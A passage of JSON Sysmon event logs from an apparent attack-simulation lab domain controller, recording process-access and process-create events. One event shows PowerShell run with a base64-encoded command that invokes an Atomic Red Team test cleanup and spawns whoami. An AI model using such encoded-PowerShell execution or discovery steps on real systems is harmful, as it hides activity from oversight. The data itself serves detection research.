C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5495,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5496,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-032E-5F25-0000-001070530A00}\r\nSourceProcessId: 660\r\nSourceThreadId: 2988\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032F-5F25-0000-001058930A00}\r\nTargetProcessId: 748\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-032E-5F25-0000-001070530A00}","SourceProcessId":"660","SourceThreadId":"2988","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032F-5F25-0000-001058930A00}","TargetProcessId":"748","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5497,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.542\r\nProcessGuid: {A837DB8D-032F-5F25-0000-00107B940A00}\r\nProcessId: 2272\r\nImage: C:\\Windows\\System32\\whoami.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: whoami - displays logged on user information\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: whoami.exe\r\nCommandLine: \"C:\\Windows\\system32\\whoami.exe\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032E-5F25-0000-0020CE520A00}\r\nLogonId: 0xA52CE\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9\r\nParentProcessGuid: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nParentProcessId: 3088\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.542","ProcessGuid":"{A837DB8D-032F-5F25-0000-00107B940A00}","Image":"C:\\Windows\\System32\\whoami.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"whoami - displays logged on user information","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"whoami.exe","CommandLine":"\"C:\\Windows\\system32\\whoami.exe\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032E-5F25-0000-0020CE520A00}","LogonId":"0xa52ce","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9","ParentProcessGuid":"{A837DB8D-032F-5F25-0000-0010BE790A00}","ParentProcessId":"3088","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5498,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-032F-5F25-0000-0010BE790A00}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4876\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-032F-5F25-0000-00107B940A00}\r\nTargetProcessId: 2272\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98992f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e281d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e342a5(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-032F-5F25-0000-0010BE790A00}","SourceProcessId":"3088","SourceThreadId":"4876","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-032F-5F25-0000-00107B940A00}","TargetProcessId":"2272","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98992f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e281d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e342a5(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c(wow64)","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5499,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032F-5F25-0000-00107B940A00}\r\nTargetProcessId: 2272\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032F-5F25-0000-00107B940A00}","TargetProcessId":"2272","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5500,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:47.531","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5501,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:47.531\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 